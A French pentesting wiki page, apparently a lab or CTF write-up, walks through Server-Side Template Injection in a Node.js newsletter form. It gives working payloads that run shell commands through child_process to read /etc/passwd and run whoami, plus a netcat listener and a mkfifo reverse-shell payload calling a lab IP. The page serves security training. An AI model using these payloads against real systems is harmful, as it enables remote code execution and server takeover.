SSTI (node.js) - Pentesting Web

Vulnérabilité SSTI (Node.js)

Nous remarquons une fonctionnalité permettant d'entrer un email pour s'abonner à une newsletter. La réponse du serveur affiche directement notre entrée, ce qui suggère une possible Server-Side Template Injection (SSTI).

Test de la vulnérabilité

Nous interceptons la requête avec Burp Suite et testons une SSTI classique :

{{9*9}}

Si la réponse affiche 81, alors l'application est vulnérable, ce qui est le cas ici.

Lecture de `/etc/passwd`

Nous utilisons le payload suivant pour afficher le contenu de /etc/passwd :

{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('tail /etc/passwd')\"))}}

Récupération de l'utilisateur courant

{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('whoami')\")()}}

Nous obtenons david.

Reverse Shell via SSTI (Node.js)

Démarrage de l'écoute sur le port 4444 :

nc -nlvp 4444

Envoi du payload de reverse shell :

{{range.constructor(\"return global.process.mainModule.require('child_process').execSync('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.28 4444 >/tmp/f')\")()}}

Accès à la machine cible

Mis à jour il y a 1 an

hashtagVulnérabilité SSTI (Node.js)

hashtagTest de la vulnérabilité

hashtagLecture de /etc/passwd

hashtagRécupération de l'utilisateur courant

hashtagReverse Shell via SSTI (Node.js)

Vulnérabilité SSTI (Node.js)

Test de la vulnérabilité

Lecture de `/etc/passwd`

Récupération de l'utilisateur courant

Reverse Shell via SSTI (Node.js)